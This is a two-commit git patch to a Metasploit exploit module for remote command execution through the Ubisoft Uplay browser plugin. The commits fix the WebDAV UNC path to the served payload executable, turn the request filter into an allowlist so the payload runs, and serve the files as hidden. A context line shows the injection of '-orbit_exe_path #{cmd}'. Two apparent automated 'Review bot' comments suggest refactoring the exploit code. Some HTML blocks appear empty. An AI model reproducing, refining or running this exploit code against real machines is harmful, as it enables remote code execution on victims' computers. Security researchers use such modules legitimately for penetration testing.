From 833999b2c35381136c1735d43c6379830482277c Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 4 Aug 2012 17:59:45 +0100 Subject: [PATCH 1/2] Changed blacklist to 404 all files that are not our share and executable - this allows windows/exec payload to work --- .../windows/browser/ubisoft_uplay_cmd_exec.rb | 43 ++++++++++--------- 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 8c79c514c3..70b298dc40 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" - path = "#{@exploit_unc}#{@share_name}#{@basename}.exe" + path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe" if path.length > 693 fail_with(Exploit::Failure::Unknown,"Remote path is too long must be < 694 characters") @@ -118,17 +118,16 @@ class Metasploit3 < Msf::Exploit::Remote classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39" type = "application/x-uplaypc" # Unused but alternative to classid - content = %Q| - - - - - - | + content = %Q| + + + +| print_status("GET => Exploit") send_response_html(cli, content) @@ -136,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote end def process_get(cli, request) - myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] webdav = "\\\\#{myhost}\\" 
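Review bot: The UNC path to the served executable is assembled inline twice — `path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"` in the first hunk and the string inside `vprint_status("Payload available at …")` in the last hunk of this patch — and the missing `\\` separator this commit has to fix in both places is the drift that such duplication invites. A single private helper, `def payload_unc_path; "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"; end`, called from both sites keeps the two strings from diverging again and gives the `path.length > 693` check a named value to document. The method enclosing the `path` assignment starts before this hunk, and `@exploit_unc`, `@share_name` and `@basename` are set elsewhere in the file, so their contents cannot be checked here.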
@@ -397,16 +395,19 @@ class Metasploit3 < Msf::Exploit::Remote # This method rejects requests that are known to break exploitation def blacklisted_path?(uri) - return true if uri =~ /\.(config|manifest|Local|dll)/i - return true if uri =~ /desktop\.ini/i - return true if uri =~ /lib.*\.dll/i - return true if uri =~ /\.tmp$/i - return true if uri =~ /(pcap|packet)\.dll/i - false + share_path = "/#{@share_name}" + payload_path = "#{share_path}/#{@basename}.exe" + case uri + when payload_path + return false + when share_path + return false + else + return true + end end def exploit - if datastore['EXPLOITPATH'] @uplay_uri = datastore['EXPLOITPATH'] else @@ -421,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') end - vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}") + vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe") print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}") super From 1aacea951db475607db9fc7858d67b4eb6ec1c54 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 4 Aug 2012 18:03:12 +0100 Subject: [PATCH 2/2] Serve files as hidden --- modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 70b298dc40..3a5ac40576 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -377,6 +377,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_ application/octet-stream HTTP/1.1 200 OK +1 |
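Review bot: The header comment `# This method rejects requests that are known to break exploitation` is stale after this rewrite of `blacklisted_path?`: the method is now an allowlist that returns false only for `share_path` and `payload_path` and true for every other URI, so the comment and the name describe the opposite of what the body does. Reword the comment to something like `# Allowlist: only the share root and the payload file are served; any other URI is reported as blacklisted (the caller answers those with 404, per the commit message)`, hedging the 404 part since the caller is outside the hunk. Style-wise, a `case` whose branches all `return` a literal collapses to `![share_path, payload_path].include?(uri)`, or `case uri when share_path, payload_path then false else true end`, which also drops the explicit returns. `@share_name` and `@basename` are assigned outside this hunk, so the exact strings being matched cannot be verified here.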